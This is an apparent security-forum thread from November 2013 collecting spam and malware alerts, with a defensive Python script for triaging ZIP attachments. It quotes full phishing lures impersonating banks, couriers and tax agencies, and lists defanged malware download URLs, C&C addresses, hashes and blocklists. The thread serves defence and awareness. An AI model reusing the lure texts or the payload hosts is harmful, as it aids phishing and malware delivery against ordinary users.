please contact us via e-mail at paychexemail@ paychex .com during regular business hours.
Thank you for your cooperation.

Attached is a file ACAS1104201336289204PARA7747.zip which in turn contains an executable ACAS11042013.exe which has a VirusTotal detection rate of 7/46*. Automated analysis... shows an attempted connection to slowdating .ca on 69.64.39.215 (Hosting Solutions International, US). There are several legitimate sites on this server, however it is possible that the server itself is compromised. The malware drops several files..."
* https://www.virustotal.com/en-gb/file/20513b4d72843de749e677310f75288e91265be57ec5381ad87eb190e1cf22bd/analysis/1383665169/

- https://www.virustotal.com/en/ip-address/69.64.39.215/information/
___

Fake USPS SPAM / Label_442493822628.zip
- http://blog.dynamoo.com/2013/11/usps-spam-label442493822628zip.html
5 Nov 2013 - "This -fake- USPS spam has a malicious attachment:
Date: Tue, 5 Nov 2013 14:24:45 +0000 [09:24:45 EST]
From: USPS Express Services [service-notification@ usps .gov]
Subject: USPS - Missed package delivery
The courier company was not able to deliver your parcel by your address.
Cause: Error in shipping address.
Label: 442493822628
Print this label to get this package at our post office.
Please attention!
For mode details and shipping label please see the attached file.
Please do not reply to this e-mail, it is an unmonitored mailbox!
Thank you,
USPS Logistics Services...

The attachment is Label_442493822628.zip which in turn contains a malicious executable Label_11052013.exe which has a VirusTotal detection rate of 6/46*. Automated analysis... shows an attempted connection to sellmakers .com on 192.64.115.140 (Namecheap, US). Note that there may be legitimate sites on that IP address, however it is possible that the whole server has been compromised."
* https://www.virustotal.com/en-gb/file/40260e01b9ed71d41c651209f74a08f77a7dcb65423dfa6bff94dd8c0348d5af/analysis/1383666106/

- https://www.virustotal.com/en-gb/ip-address/192.64.115.140/information/

:mad: :fear: :mad:

AplusWebMaster
2013-11-06, 17:23
FYI...

Fake invoice SPAM leads to DOC exploit
- http://blog.dynamoo.com/2013/11/invoice-17731-from-victoria-commercial.html
6 Nov 2013 - "This -fake- invoice email leads to a malicious Word document:
From: Dave Porter [mailto:dave.porter@blueyonder .co .uk]
Sent: 06 November 2013 12:06
To: [redacted]
Subject: Invoice 17731 from Victoria Commercial Ltd
Dear Customer :
Your invoice is attached to the link below:
[donotclick]http ://www.vantageone .co .uk/invoice17731.doc
Please remit payment at your earliest convenience.
Thank you for your business - we appreciate it very much.
Sincerely,
Victoria Commercial Ltd

The email originates from bosmailout13.eigbox .net 66.96.186.13 which belongs to the Endurance International Group in the US. The malicious .DOC file is hosted at [donotclick]www.vantageone .co .uk/invoice17731 .doc which appears to be a -hacked- legitimate web site.
Detection rates have continued to improve throughout the day and currently stand at 10/47*. The vulnerability in use is CVE-2012-0158 / MS12-027. If your Word installation is up-to-date and fully patched then it should block this attack.
A sandbox analysis confirms that it is malicious, in particular it connects to 158.255.2.60 (Mir Telematiki Ltd, Russia) and the following domains:
feed404.dnsquerys .com
feeds.nsupdatedns .com
It is the same attack as described by Blaze's Security Blog** and I would advise you to look at that posting for more details. In the meantime, here is a recommended blocklist:
118.67.250.91
158.255.2.60 ..."
* https://www.virustotal.com/en-gb/file/6c654921074a82ff6f4a6309b5dfa94587efcb81cd3d8559eac3488102f51d0a/analysis/1383746893/

** http://bartblaze.blogspot.co.uk/2013/11/latest-ups-spam-runs-include-exploits.html

- https://www.virustotal.com/en/ip-address/118.67.250.91/information/

- https://www.virustotal.com/en/ip-address/158.255.2.60/information/
___

Fake voice mail SPAM / VoiceMail.zip
- http://blog.dynamoo.com/2013/11/voice-message-from-unknown-spam.html
6 Nov 2013 - "This -fake- voice mail spam comes with a malicious attachment:
Date: Wed, 6 Nov 2013 22:22:28 +0800 [09:22:28 EST]
From: Administrator [voice9@ victimdomain]
Subject: Voice Message from Unknown (886-966-4698)
- - -Original Message- - -
From: 886-966-4698
Sent: Wed, 6 Nov 2013 22:22:28 +0800
To: recipients@ victimdomain
Subject: Private Message

The email appears to come from an email address on the victim's own domain and the body text contains a list of recipients within that same domain. Attached to the email is a file VoiceMail.zip which in turn contains a malicious executable VoiceMail.exe with an icon to make it look like an audio file. This malware file has a detection rate of 3/47* at VirusTotal. Automated analysis tools... show an attempted connection to twitterbacklinks .com on 216.151.138.243 (Xeex, US) which is a web host that has been seen before** in this type of attack. Xeex seems to divide up its network into /28 blocks, which would mean that the likely compromised block would be 216.151.138.240/28... domains are consistent with the ones compromised here*** and it is likely that they have all also been compromised.
Recommended blocklist:
69.26.171.176/28
216.151.138.240/28 ..."
(More listed at the dynamoo URL above.)
* https://www.virustotal.com/en-gb/file/f086f403c85530de181708f588e8d5d27f4727e5f44d7f5fb0d4a7f35b1688f0/analysis/1383748084/

** http://blog.dynamoo.com/search/label/Xeex

*** http://blog.dynamoo.com/2013/10/suspect-network-692617117628.html

:mad::mad: :fear:

AplusWebMaster
2013-11-07, 19:54
FYI...

Fake voicemail SPAM / Voice_Mail.exe
- http://blog.dynamoo.com/2013/11/you-received-voice-mail-spam.html
7 Nov 2013 - "This -fake- voice mail spam has a malicious attachment:
Date: Thu, 7 Nov 2013 15:58:15 +0100 [09:58:15 EST]
From: Microsoft Outlook [no-reply@ victimdomain .net]
Subject: You received a voice mail
You received a voice mail : N_58Q-ILM-94XZ.WAV (182 KB)
Caller-Id:
698-333-5643
Message-Id:
80956-84B-12XGU
Email-Id:
[redacted]
This e-mail contains a voice message.
Double click on the link to listen the message.
Sent by Microsoft Exchange Server

Screenshot: https://lh3.ggpht.com/-TcGTepv34NQ/Unu1BKezJaI/AAAAAAAACOs/NNjOsDO0uC0/s1600/voicemail.png

Attached is a zip file in the format Voice_Mail_recipientname.zip which in turn contains a malicious file Voice_Mail.exe which has an icon to make it look like an audio file. VirusTotal detection for that is 7/47* and automated analysis tools... show an attempted connection to amazingfloorrestoration .com on 202.150.215.66 (NewMedia Express, Singapore). Note that sometimes other sites on these servers have also been compromised, so if you see any odd traffic to this IP then it could well be malicious."
* https://www.virustotal.com/en-gb/file/854cf63454d0cd8df2cdae4183b2d1b1e25ea347b081931af18b916c7adf14c4/analysis/1383838216/

- https://www.virustotal.com/en/ip-address/202.150.215.66/information/
___

Visa Recent Transactions Report Spam
- http://threattrack.tumblr.com/post/66285164149/visa-recent-transactions-report-spam
Nov 7, 2013 - "Subjects Seen:
VISA - Recent Transactions Report
Typical e-mail details:
Dear Visa card holder,
A recent review of your transaction history determined that your card was used in possible fraudulent transactions. For security reasons the requested transactions were refused. Please carefully review electronic report for your VISA card.
For more details please see the attached transaction report.
Dion_Andersen
Data Protection Officer
VISA EUROPE LIMITED
1 Sheldon Square
London W2 6WH
United Kingdom

Malicious File Name and MD5:
payment.exe (A4D868FB8A01CA999F08E5739A5E73DC)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/4615addb73be1f23ecb588a8f136cc96/tumblr_inline_mvwj2jIxPM1r6pupn.png
___

DocuSign - Internal Company Changes Spam
- http://threattrack.tumblr.com/post/66283048697/docusign-internal-company-changes-spam
Nov 7, 2013 - "Subjects Seen:
Please DocuSign this document : Company Changes - Internal Only
Typical e-mail details:
Sent on behalf of <email address>.
All parties have completed the envelope ‘Please DocuSign this document: Company Changes - Internal Only..pdf’.
To view or print the document download the attachment. (self-extracting archive, Adobe PDF)
This document contains information confidential and proprietary to <email domain>

Malicious File Name and MD5:
Company Changes - Internal Only.PDF.zip (1B853B2962BB6D5CAA7AB4A64B83EEFF)
Company Changes - Internal Only.PDF.exe (03C3407D732A94B05013BD2633A9E974)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/bb23ef96a17891dc0951c011dad6a4d7/tumblr_inline_mvwhhsr8NO1r6pupn.png
___

My FedEx Rewards Spam
- http://threattrack.tumblr.com/post/66278510467/my-fedex-rewards-spam
Nov 7, 2013 - "Subjects Seen:
Your Rewards Order Has Shipped
Typical e-mail details:
This is to confirm that one or more items in your order has been shipped. Note that multiple items in an order may be shipped separately.
You can review complete details of your order on the Order History page
Thanks for choosing FedEx.

Malicious File Name and MD5:
Order history page.zip (EE074EAACC3D444563239EF0C9F4CE0D)
Order history page.pdf.exe (DF86900EC566E13B2A8B7FD9CFAC5969)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/a9446772300a4ba33ec3f56ef005039f/tumblr_inline_mvwdqhG7MY1r6pupn.png

:mad: :fear:

AplusWebMaster
2013-11-08, 22:22
FYI...

Malware sites to block - (Nuclear EK)
- http://blog.dynamoo.com/2013/11/malware-sites-to-block-8112013-nuclear.html
8 Nov 2013 - "The IPs and domains listed below are currently in use to distribute the Nuclear exploit kit (example*). I strongly recommend blocking them or the 142.4.194.0/30 range in which these reside. Many (but not all) of them are already flagged as being malicious by SURBL and Google. The domains are being used with subdomains, so they don't resolve directly. I have identified -3768- domains in this OVH range... The subdomains can be found in this file [csv**] but as it is almost definitely incomplete it is simpler to use the blocklist below:
142.4.194.0/30 ..."
(More domains listed at the dynamoo URL above.)
* http://urlquery.net/report.php?id=7517029

** http://www.dynamoo.com/files/penziatki-private-customer.csv
___

Fake Voicemail SPAM / MSG00049.zip and MSG00090.exe
- http://blog.dynamoo.com/2013/11/voicemail-message-spam-msg00049zip-and.html
8 Nov 2013 - "Another day, yet another -fake- voicemail message spam with a malicious attachment:
Date: Fri, 8 Nov 2013 15:15:20 +0000 [10:15:20 EST]
From: Voicemail [user@ victimdomain .com]
Subject: Voicemail Message
IP Office Voicemail redirected message

Attached is a file MSG00049.zip which in turn contains a malicious executable MSG00090.exe. Virus detection on VirusTotal is a so-so 12/47*. Automated analysis... shows an attempted connection to seminyak-italian .com on 198.1.84.99 (Unified Layer / Websitewelcome, US). There are 7 or so legitimate sites on that server, I cannot vouch for them being safe or not."
* https://www.virustotal.com/en-gb/file/7cd710517520b00227fc4e591cb0943f7de341f181b4cd14cc8737494b977f1e/analysis/1383936341/

- https://www.virustotal.com/en/ip-address/198.1.84.99/information/
___

Shylock/Caphaw Drops Blackhole for Styx and Nuclear
- http://www.threattracksecurity.com/it-blog/shylock-caphaw-drops-blackhole-for-styx-and-nuclear/
Nov 8, 2013 - "In early October, news of the arrest of “Paunch” and his cohorts in Russia... Because of this, experts in the security industry had noticed the lack of new updates for the BHEK. Our experts in the Labs also concurred a possible dropping of threats involving the BHEK. With this in mind, it’s highly likely for online criminals to look for other alternatives...
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/directed-to-exploit.jpg
... Sutra TDS has been associated with a number of Web threats, such as exploits (BHEK), rogue AV and ransomware among others as part of their infection and/or propagation tactics for years. Even phishers have jumped into the bandwagon... steps you can take in protecting yourself against Styx-based threats:
• Make sure to update all your software in real-time. You might be better off using a patch management software to assist on this. Such programs run in the background and prompts users whenever it detects new updates for software users have installed on systems.
• Keep your antivirus software also up-to-date.
• Block or filter off URLs with patterns that resemble Sutra TDS landing pages. Please ask assistance from someone if you need to."
___

Key Bank Secure Message Spam
- http://threattrack.tumblr.com/post/66377019759/key-bank-secure-message-spam
Nov 8, 2013 - "Subjects Seen:
You have received a secure message
Typical e-mail details:
Read your secure message by opening the attachment, Secure_Message.zip. You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it in a Web browser. To access from a mobile device, forward this message to mobile @ res. cisco .com to receive a mobile login URL.
If you have concerns about the validity of this message, please contact the sender directly. For questions about Key’s e-mail encryption service, please contact technical support at 888.764.7941.
First time users - will need to register after opening the attachment.

Malicious File Name and MD5:
Secure_Message.zip (4301BE522A5254DBB5DBCF96023526B9)
Secure_Message.exe (8E0E9C0995B220FA8DFBC8BFFA54759F)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/a93ab444b3cd245f3bd7b11ccfa4df41/tumblr_inline_mvyd7vEbVl1r6pupn.png

:mad: :fear::fear:

AplusWebMaster
2013-11-11, 16:02
FYI...

Typhoon Scams... Email, Telephone, Door to Door
- http://www.threattracksecurity.com/it-blog/typhoon-haiyan-scams-rounds-email-telephone-door-door/
Nov 11, 2013 - "In the wake of Typhoon Haiyan, both law enforcement and members of the public are coming forward to make timely reminders related to donation scams.
1) Police in Huntsville, Ontario have warned of individuals from unverified donation campaigns* going door to door.
Sudden arrivals on your doorstep asking for donations related to any form of disaster should always be viewed with suspicion, and keep in mind that any form of ID can be faked convincingly. If the person is particularly pushy about you handing over money in a short period of time, be extra suspicious...
2) Anxious friends and relatives of those who have gone missing are apparently posting up too much personal information on social networks in their quest to re-establish contact... Avoid posting personal details to sites such as Twitter and Facebook.
3) In the US, cold calling from individuals claiming to be from the Salvation Army asking for Typhoon relief donations has begun. I did a little digging on the phone number listed, and it appears on a Snopes page*** related to Hurricane Sandy FEMA cleanup crews... If you want to donate through Salvation Army, you should visit their donation page** and keep cold calls to your telephone line on the back burner.
4) Scam emails are already in circulation. Expect the majority of these to ride on the coat-tails of efforts by organisations such as The Red Cross. One particularly devious tactic to watch out for is scammers giving you a real, genuine domain as a reply email to send your bank details to but including a fake as a CC address..."
(More detail at the threattracksecurity URL above.)

* http://moosefm.com/cfbg/news/14095-police-warning-about-potential-typhoon-scam

** https://donate.salvationarmyusa.org/TyphoonHaiyan

*** http://www.snopes.com/fraud/employment/femasandy.asp
___

- https://www.us-cert.gov/ncas/current-activity/2013/11/12/Philippines-Typhoon-Disaster-Email-Scams-Fake-Antivirus-and
Nov 12, 2013
___

Adware sites to block / "Consumer Benefit Ltd" ...
- http://blog.dynamoo.com/2013/11/consumer-benefit-ltd-adware-sites-to.html
11 Nov 2013 - "A couple of network blocks came to my attention after investigating some adware ntlanmbn.exe (VirusTotal report*) and GFilterSvc.exe (report**) both in C:\WINDOWS\SYSTEM32. The blocks are 212.19.36.192/27 and 82.98.97.192/28 ... Many of the domains currently or recently hosted in these IP ranges are clearly deceptive in nature... the following domains and IPs are all part of these "Consumer Benefit Ltd" ranges and appear to be adware-related and have unclear ownership details. If you block adware sites on your network then I would recommend using the following blocklist:
212.19.36.192/27
82.98.97.192/28 ..."
(More detail and URLs listed at the dynamoo URL above.)

* https://www.virustotal.com/en-gb/file/4ccc3fd07b45d285940bc931b0b0c09e1184882faaf1e288245fc4f3f523b847/analysis/1384162704/

** https://www.virustotal.com/en-gb/file/d0eaa89c7f094c52fc758e43dbe0e122b67f4df392254b210a153a25ce8d2ae7/analysis/1384162774/
___

Fake Confidential Message SPAM / To All Employees 2013.zip.exe
- http://blog.dynamoo.com/2013/11/to-all-employees-confidential-message.html
11 Nov 2013 - "This -fake- "all employees" email comes with a malicious attachment:
Date: Mon, 11 Nov 2013 11:28:29 +0000 [06:28:29 EST]
From: DocuSign Service [dse@ docusign .net]
Subject: To all Employees - Confidential Message
Your document has been completed
Sent on behalf of administrator@victimdomain.
All parties have completed the envelope 'Please DocuSign this document:
To All Employees 2013.doc'.
To view or print the document download the attachment .
(self-extracting archive, Adobe PDF) This document contains information confidential and proprietary to spamcop .net
DocuSign. The fastest way to get a signature. If you have questions regarding this notification or any enclosed documents requiring yoursignature, please contact the sender directly...

The attachment to the email is called To All Employees 2013.zip which contains To All Employees 2013.zip.exe which has an icon that makes it look like a PDF file. This malicious file has a VirusTotal detection rate of 7/47*. Automated analysis... shows a callback to trc-sd .com on 121.127.248.74 (Sun Network, Hong Kong). This IP address hosts several legitimate sites, so bear that in mind if you block the IP."
* https://www.virustotal.com/en-gb/file/ab07dbeca3a3a3703007949ed05a100f95ce89d7e937fe320222a7812c904d16/analysis/1384175853/

- https://www.virustotal.com/en-gb/ip-address/121.127.248.74/information/
___

Fake Paypal SPAM / Identity_Form_04182013.zip
- http://blog.dynamoo.com/2013/11/identity-issue-pp-716-097-521-587-spam.html
11 Nov 2013 - "For some reason EXE-in-ZIP attacks are all the rage at the moment, here is a -fake- spam pretending to be from PayPal with a malicious attachment:
Date: Mon, 11 Nov 2013 19:14:10 +0330 [10:44:10 EST]
From: Payroll Reports [payroll@ quickbooks .com]
Subject: Identity Issue #PP-716-097-521-587
We are writing you this email in regards to your PayPal account. In accordance with our
"Terms and Conditions", article 3.2., we would like to kindly ask you to confirm your
identity by completing the attached form. Please print this form and fill in the
requested information. Once you have filled out all the information on the form please
send it to verification@ paypal .com along with a personal identification document
(identity card, driving license or international passport) and a proof of address
submitted with our system ( bank account statement or utility bill )
Your case ID for this reason is PP-D503YC19DXP3
For your protection, we might limit your account access. We apologize for any
inconvenience this may cause.
Thanks, PayPal...

Attached is a file Identity_Form_04182013.zip which in turn contains Identity_Form_04182013.exe which as you might guess is malicious. VirusTotal detections are 16/47*, and automated analysis... shows an attempted connection to trc-sd .com which is the same domain seen in this attack**."
* https://www.virustotal.com/en-gb/file/ab07dbeca3a3a3703007949ed05a100f95ce89d7e937fe320222a7812c904d16/analysis/1384185446/

** http://blog.dynamoo.com/2013/11/to-all-employees-confidential-message.html
___

American Express Suspicious Activity Report Spam
- http://threattrack.tumblr.com/post/66684841364/american-express-suspicious-activity-report-spam
Nov 11, 2013 - "Subjects Seen:
Recent Activity Report - Incident #6U7X67B05H6NGET
Typical e-mail details:
As part of our security measures, we deliver appropriate monitoring of transactions and customers to identify potentially unusual or suspicious activity and transactions in the American Express online system.
Please review the “Suspicious Activity Report” document attached to this email.
Your Cardmember information is included in the upper-right corner of this document to help you recognize this as a customer service e-mail from American Express. To learn more about e-mail security or report a suspicious e-mail, please visit us at americanexpress .com/phishing
Thank you for your Cardmembership.
Sincerely,
Lindsey_Oneal
Tier III Support
American Express Account Security
Fraud Prevention and Detection Network

Malicious File Name and MD5:
Incident#<random>.zip (14F92A367A01C5AD8F0C4A7062000FE6)
Incident#.exe (77F23BC4F0ECB244FAA61163B07EAEC7)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/633dc733982657f7327c5dd769f322e8/tumblr_inline_mw3y824fCm1r6pupn.png

Tagged:
American Express: http://threattrack.tumblr.com/tagged/American-Express
Upatre: http://threattrack.tumblr.com/tagged/Upatre

:mad: :fear:
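The EXE-in-ZIP lures that run through this thread (an executable carrying a PDF, Excel or audio icon and a double extension such as .pdf.exe, sometimes paired with a published MD5) can be triaged mechanically at the mail gateway before anyone opens them. The Python below is an added example, not code from dynamoo, ThreatTrack or any other source quoted here; the archive it inspects is constructed inline, and the known-bad hash set is a placeholder for indicators of the kind listed above.

```python
import hashlib
import io
import zipfile
from dataclasses import dataclass, field
from typing import FrozenSet, List

# Extensions Windows will execute when double-clicked.
EXECUTABLE_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "vbs"}
# Document/media types the lures in this thread impersonate.
DECOY_EXTS = {"pdf", "doc", "xls", "wav", "mp3", "zip", "txt"}
PE_MAGIC = b"MZ"              # DOS/PE header every Windows executable starts with
MAX_ENTRY_BYTES = 50 * 1024 * 1024  # refuse to inflate anything larger (zip-bomb guard)


@dataclass
class Finding:
    name: str
    md5: str
    reasons: List[str] = field(default_factory=list)


def md5_hex(data: bytes) -> str:
    """Upper-case MD5, the format the alerts above publish."""
    return hashlib.md5(data).hexdigest().upper()


def classify_name(name: str) -> List[str]:
    """Reasons derived from the entry name alone (before reading any bytes)."""
    reasons: List[str] = []
    parts = name.lower().rsplit("/", 1)[-1].split(".")
    if len(parts) < 2:
        return reasons
    ext = parts[-1]
    if ext in EXECUTABLE_EXTS:
        reasons.append(f"executable extension .{ext}")
        # "Order history page.pdf.exe": a decoy document name in front of the real extension
        if len(parts) >= 3 and parts[-2] in DECOY_EXTS:
            reasons.append(f"double extension .{parts[-2]}.{ext}")
    return reasons


def classify_content(data: bytes, name: str) -> List[str]:
    """Reasons derived from the file header, independent of what the name claims."""
    reasons: List[str] = []
    if data[:2] == PE_MAGIC:
        ext = name.lower().rsplit(".", 1)[-1]
        if ext in EXECUTABLE_EXTS:
            reasons.append("PE header confirms Windows executable")
        else:
            reasons.append("PE header but non-executable extension (renamed binary)")
    return reasons


def triage_zip(zip_bytes: bytes, known_bad: FrozenSet[str] = frozenset()) -> List[Finding]:
    """Return one Finding per suspicious entry in the archive."""
    findings: List[Finding] = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            reasons = classify_name(info.filename)
            digest = ""
            if info.file_size <= MAX_ENTRY_BYTES:
                data = zf.read(info)
                digest = md5_hex(data)
                reasons += classify_content(data, info.filename)
                if digest in known_bad:
                    reasons.append("MD5 matches a published indicator")
            else:
                reasons.append("entry too large to inspect; treated as suspicious")
            if reasons:
                findings.append(Finding(info.filename, digest, reasons))
    return findings


# Constructed sample: a minimal stub with a PE header, NOT a real executable.
SAMPLE_PE_STUB = b"MZ\x90\x00" + b"\x00" * 60 + b"PE\x00\x00"


def build_sample_zip() -> bytes:
    """Constructed archive modelled on the lures in this thread (names only; contents are stubs)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Order history page.pdf.exe", SAMPLE_PE_STUB)  # double extension
        zf.writestr("VoiceMail.exe", SAMPLE_PE_STUB)               # plain EXE with audio icon
        zf.writestr("report.pdf", SAMPLE_PE_STUB)                  # binary renamed to look benign
        zf.writestr("readme.txt", b"plain text, nothing to see")   # benign control entry
    return buf.getvalue()


if __name__ == "__main__":
    for f in triage_zip(build_sample_zip(), known_bad=frozenset({md5_hex(SAMPLE_PE_STUB)})):
        print(f.name, f.md5, "; ".join(f.reasons))
```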

AplusWebMaster
2013-11-12, 21:13
FYI...

Dynamic DNS sites you might want to block ...
- http://blog.dynamoo.com/2013/11/dynamic-dns-sites-you-might-want-to.html
12 Nov 2013 - "These domains are used for dynamic DNS and are operated by a company called Dyn who offer a legitimate service, but unfortunately it is -abused- by malware writers. If you are the sort of organisation that blocks dynamic DNS IPs then I recommend that you consider blocking the following... listed in yellow have been identified as having some malware by Google, ones listed in red are blocked by Google. Ones listed in italics are flagged as malicious by SURBL*. The links go to the Google diagnostic page."
(Long list at the dynamoo URL above.)
* http://www.surbl.org/lists
___

Fake HMRC SPAM - HMRC_Message.zip and qualitysolicitors .com
- http://blog.dynamoo.com/2013/11/you-have-received-new-messages-from.html
12 Nov 2013 - "This fake HMRC spam comes with a malicious attachment. Because the spammers have copied-and-pasted the footer from somewhere random it also effectively joe jobs an innocent site called qualitysolicitors .com:
Date: Tue, 12 Nov 2013 05:29:28 -0500 [05:29:28 EST]
From: "noreply@hmrc .gov .uk" [noreply@hmrc .gov .uk]
Subject: You have received new messages from HMRC
Please be advised that one or more Tax Notices (P6, P6B) have been issued.
For the latest information on your Tax Notices (P6, P6B) please open attached report.
Please do not reply to this e-mail.
1.This e-mail and any files or documents transmitted with it are confidential and
intended solely for the use of the intended recipient. Unauthorised use, disclosure or
copying is strictly prohibited and may be unlawful. If you have received this e-mail in
error, please notify the sender at the above address and then delete the e-mail from your
system.
2. If you suspect that this e-mail may have been intercepted or amended, please
notify the sender. 3. Any opinions expressed in this e-mail are those of the individual
sender and not necessarily those of QualitySolicitors Punch Robson. 4. Please note that
this e-mail and any attachments have been created in the knowledge that internet e-mail
is not a 100% secure communications medium. It is your responsibility to ensure that they
are actually virus free. No responsibility is accepted by QualitySolicitors Punch Robson
for any loss or damage arising from the receipt of this e-mail or its contents.
QualitySolicitors Punch Robson: Main office 35 Albert Road Middlesbrough TS1 1NU
Telephone 01642 230700. Offices also at 34 Myton Road, Ingleby Barwick, Stockton On Tees,
TS17 0WG Telephone 01642 754050 and Unit E, Parkway Centre, Coulby Newham, Middlesbrough
TS8 0TJ Telephone 01642 233980 VAT no. 499 1588 77. Authorised and regulated by the
Solicitors Regulation Authority (57864). A full list of Partners names is available from
any of our offices...

... there's a ZIP file called HMRC_Message.zip which in turn contains a malicious executable HMRC_Message.exe which has a VirusTotal detection rate of 12/47*. Automated analysis tools... show that it attempts to communicate with alibra .co .uk on 78.137.113.21 (UKfastnet Ltd, UK) and then it attempts to download additional components from:
[donotclick]synchawards .com/a1.exe
[donotclick]itcbadnera .org/images/dot.exe
a1.exe has a detection rate of 16/47**, and Malwr reports further HTTP connections to:
[donotclick]59.106.185.23 /forum/viewtopic.php
[donotclick]new.data.valinformatique .net/5GmVjT.exe
[donotclick]hargobindtravels .com/38emc.exe
[donotclick]bonway-onza .com/d9c9.exe
[donotclick]friseur-freisinger .at/t5krH.exe
dot.exe has a much lower detection rate of 6/47***... various types of activity including keylogging and credential harvesting. There are also many, many HTTP connections to various hosts, I suspect this is attempting to mask the actual C&C servers it is connecting to.
a1.exe downloads several more files, all of which appear to be the same. The VirusTotal detection rate for these is 5/47***, Malwr reports several attempted IP connections that look a bit like peer-to-peer Zeus."
Recommended blocklist:
59.106.185.23 ..."
(More URLS listed at the dynamoo URL above.)
* https://www.virustotal.com/en-gb/file/c01fa56f1c18f2c4249606cb1cd8166118f026e3a7833005c2a01b58881dbbf9/analysis/1384264864/

** https://www.virustotal.com/en-gb/file/afb912f62363bdbbd667a3ef6ae5eff9adfd47c6e78171459306681dd8b04a50/analysis/1384265605/

*** https://www.virustotal.com/en-gb/file/c6221e19d2df42f2e1318a3c74c035802cb9dcc86923bd6c49f23bb13c130a86/analysis/1384266070/
___

Fake "Outlook Settings" SPAM - Outlook.zip
- http://blog.dynamoo.com/2013/11/important-new-outlook-settings-spam.html
12 Nov 2013 - "This spam email has a malicious attachment:
Date: Tue, 12 Nov 2013 16:22:38 +0100 [10:22:38 EST]
From: Undisclosed Recipients
Subject: Important - New Outlook Settings
Please carefully read the attached instructions before updating settings.
This file either contains encrypted master password, used to encrypt other files. Key archival has been implemented, in order to decrypt the file please use the following password: PaSdIaoQ
This e-mail and / or any attachment(s) is intended solely for the above-mentioned recipient(s) and it may contain confidential or privileged information. If you have received it in error, please notify us immediately at helpdesk@victimdomain and delete the e-mail. You must not copy it, distribute it, disclose it or take any action in reliance on it.

The body text of the spam contains a faked email address made to look like helpdesk@ the victim's domain. Attached to the email is a password-protected ZIP file Outlook.zip that has to be decoded with the PaSdIaoQ key in the body text of the email (hopefully intelligent people will realise that you wouldn't send the password with the encrypted attachment.. you'd have to be really daft to do that). Unzipping the file gives a malicious executable Outlook.exe which has an icon designed to look like Microsoft Outlook.
Screenshot: https://lh3.ggpht.com/-uZyweXA5n_g/UoJOXnVIA-I/AAAAAAAACPY/tKqQ0Ksz0To/s1600/outlook-icon.png
The detection rate at VirusTotal is 5/45*. Automated analysis tools... show an attempted connection to dchamt .com on 216.157.85.173 (Peer 1 Dedicated Hosting, US). That IP address contains about 70 websites which may or may not be clean."
* https://www.virustotal.com/en-gb/file/96d6e3a19d9f529dd1c8cda5460a77d1f9286213b1d8f42f4d1fb146a9132acf/analysis/1384270918/

- https://www.virustotal.com/en-gb/ip-address/216.157.85.173/information/

- http://threattrack.tumblr.com/post/66784403820/new-outlook-settings-spam
Nov 12, 2013 - "Subjects Seen:
Important - New Outlook Settings
Typical e-mail details:
Please carefully read the attached instructions before updating settings.
This file either contains encrypted master password, used to encrypt other files. Key archival has been implemented, in order to decrypt the file please use the following password: PaSdIaoQ
This e-mail and / or any attachment(s) is intended solely for the above-mentioned recipient(s) and it may contain confidential or privileged information. If you have received it in error, please notify us immediately at <sender e-mail address> and delete the e-mail. You must not copy it, distribute it, disclose it or take any action in reliance on it.

Malicious File Name and MD5:
Outlook.zip (4D0A70E1DD207785CB7067189D175679)
Outlook.exe (C8D22FA0EAA491235FA578857CE443DC)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/15b88d66ccc6974a6134c025cc9ad5a2/tumblr_inline_mw5rx8vTYV1r6pupn.png
___

Fake Tax/Accountant SPAM / tax 2012-2013.exe
- http://blog.dynamoo.com/2013/11/2012-and-2013-tax-documents-accountants.html
12 Nov 2013 - "This -fake- tax spam comes with a malicious attachment:
Date: Wed, 13 Nov 2013 00:44:46 +0800 [11:44:46 EST]
From: "support@ salesforce .com" [support@ salesforce .com]
Subject: FW: 2012 and 2013 Tax Documents; Accountant's Letter
I forward this file to you for review. Please open and view it.
Attached are Individual Income Tax Returns and W-2s for 2012 and 2013, plus an accountant's letter.
This email message may include single or multiple file attachments of varying types.
It has been MIME encoded for Internet e-mail transmission.

Attached to the file is a ZIP file called dlf2365.zip which contains a malicious executable file tax 2012-2013.exe which has an icon to make it look like a PDF file.
> https://lh3.ggpht.com/-4dRp1ML5c40/UoKNNvkL9pI/AAAAAAAACPo/3PTjlVby9Z8/s1600/tax-icon.png
VirusTotal detection rates are 17/47*. Automated analysis tools... show an attempted connection to nishantmultistate .com on 216.157.85.173 (Peer 1, US). This is the same server as used in this attack**, and you can safely assume that the whole server is compromised. Blocking this IP is probably a good idea."
* https://www.virustotal.com/en-gb/file/c792601ed172e0f235f6e7add5d4d8aa72cefc5c3427519492be080b9be128e0/analysis/1384287261/

** http://blog.dynamoo.com/2013/11/important-new-outlook-settings-spam.html
___

Department of Treasury Outstanding Obligation Spam
- http://threattrack.tumblr.com/post/66792822412/department-of-treasury-outstanding-obligation-spam
Nov 12, 2013 - "Subjects Seen:
Department of Treasury Notice of Outstanding Obligation - Case <random>
Typical e-mail details:
We have received notification from the Department of the Treasury,
Financial Management Service (FMS) that you have an outstanding
obligation with the Federal Government that requires your immediate
attention.
In order to ensure this condition does not affect any planned
contract or grant activity, please review and sign the attached document and if
you are unable to understand the attached document please call FMS at 1-800-304-3107
to address this issue. Please make sure the person making the telephone call has the
Taxpayer Identification Number available AND has the authority/knowledge
to discuss the debt for the contractor/grantee.

Malicious File Name and MD5:
FMS-Case-<random>.zip (55D31D613A6A5A57C07D496976129068)
FMS-Case-{_Case_DIG}.zip.exe (B807F603C69AEA97E900E59EC99315B5)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/74ca553a1712c3af975dfb32f39e1f04/tumblr_inline_mw5xr3YMit1r6pupn.png

:mad: :fear::fear:

AplusWebMaster
2013-11-13, 14:19
FYI...

Fake PayPal "Identity Issue" SPAM / Identity_Form_04182013.zip
